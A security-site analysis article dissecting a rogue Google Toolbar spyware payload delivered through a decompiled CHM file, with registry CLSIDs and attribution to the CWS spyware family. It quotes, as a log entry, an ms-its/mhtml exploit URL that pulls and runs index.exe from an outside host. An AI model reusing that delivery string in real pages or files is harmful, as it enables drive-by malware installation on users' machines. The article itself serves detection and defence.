Quick Links: SpywareGuide Greynets Blog | SpywareGuide Product Database | SpywareGuide Company Database | SpywareGuide Categories
Search SpywareGuide Database & Site
Security Email Alerts & Updates
SpywareGuide powered by FaceTime Security Labs

Dissection of Rogue Google Toolbar Payload

by Chris Criswell, Wayne Porter

For background on this supporting article see Boyd: "The Rogue Google Toolbar: History and Variants"


For testing purposes the CHM file (File Extension for a Microsoft Compressed HTML Help Files)?was acquired and decompiled using  specialized forensic tools.


Three files emerged from this analysis:

  1. Index.exe
  2. index.html
  3. index.hhp

Install.exe was unpacked using UPX1

BinText was utilized to?view contents.


Two CLSIDs were located: For more information see Wikipedia entry on Globally Unique Identifiers of which the
CLSID (class identifier)?is a GUID subtype.

000079A8?? 004079A8????? 0?? SOFTWARE\Microsoft\Code Store Database\Distribution Units\{E427A57F-1A94-0BFC-6D7A-6DC214946AD4}


00007A0C?? 00407A0C????? 0?? SOFTWARE\Microsoft\Code Store Database\Distribution Units\{11111111-1111-1111-1111-111111111157}


First CLSID:? {E427A57F-1A94-0BFC-6D7A-6DC214946AD4}


Using standard search procedures it was trivial to locate this CLSID via a search engine query which returned the 
following results:


CastleCops: http://castlecops.com/p598484-ABI_Network_direct_revenue.html

O16 - DPF: {E427A57F-1A94-0BFC-6D7A-6DC214946AD4} - ms-its:mhtml:file://c:\\nosuch.mht!http://users.perfhost.com/~zone14/z/index.chm::/index.exe




Tomcoyote: http://tomcoyote.org/forums/lofiversion/index.php/t43312.html


O16 - DPF: {E427A57F-1A94-0BFC-6D7A-6DC214946AD4} - ms-its:mhtml:file://c:\\nosuch.mht!http://users.perfhost.com/~zone14/z/index.chm::/index.exe



Of notable interest regarding this exploit is the methodology discovered with analysis using X-RayPC, a FaceTime process forensic tool,
The result is highlighted in yellow.


This string shows up in the downloaded files area (Active X portion) of X-RayPC.

ms-its: mhtml:file://


pqnelhleyy 365ca369 5bcd919b

This search string can be chronologically located as far back?as 2003.?
The sample below is from May 26, 2004

Reference Spywareinfo.com Forums: http://forums.spywareinfo.com/lofiversion/index.php/t2561.html

Second CLSID: {11111111-1111-1111-1111-111111111157}

Reference CastleCops: http://castlecops.com/atx-200.html

Reference: WildersSecurity.com http://www.wilderssecurity.com/showthread.php?p=182524

Based on the CLSIDs and other behaviors the file exhibits it is apparent the responsible parties are related to or are controlled by the CWS family of spyware.

1. Executable Packing is the process of compressing an executable file and
prepending adecompression stub, which is responsible for decompressing the
executable and initiating execution. The decompression stub is a standalone executable,
making packed and unpacked executables indistinguishable to the casual user as they are
not required to perform any additional steps to start execution. Software distributors
use executable packing for a variety of reasons, primarily to reduce the secondary storage
requirements of their software, however as UPX is specifically designed to compress executable
code it often achieves better compression ratios than standard data compression facilities
such as gzip, zip or bzip2. Source: Wikipedia

Unless otherwise noted this article is Copyright © 2018 by FaceTime Communications, Inc. This article may not be resold, reprinted, or redistributed for compensation of any kind without prior written permission from FaceTime Communications, Inc. For reprint or media inquires please contact us with the phrase "Spyware Guide Articles" in the subject line and we will by happy to assist you. Links to this article from other websites are appreciated and encouraged. Users are also encouraged to utilize our RSS system to provide unique content and extracts for their site.

Related Articles

Read other articles (back to full list)

Help with the BUST!
Click here and give us what details you have and let our international research team take it from there. If you desire your report will remain anonymous.
Recent Blog Posts

There was an error communicating with the requested site.

Recent Modifications
2018-10-8  Adult Networks/Services
2017-2-10  Adult Hosts
2016-3-30  CoolWebSearch
2015-9-29  Malicious URLS
2015-5-19  Dialers
2015-1-5  Email Threats
2013-7-20  Date Manager
2013-4-10  BeeBus
2012-12-18  JT.Moonwalk
2012-12-18  Sadbiz

Site EULA | Site Map | Contact Us | About Us | Site and Spyware FAQ | Advertise | RSS Feeds  | Link To Us | SpywareGuide Japan Japanese

© Copyright 2007, FaceTime Communications, Inc. All rights reserved.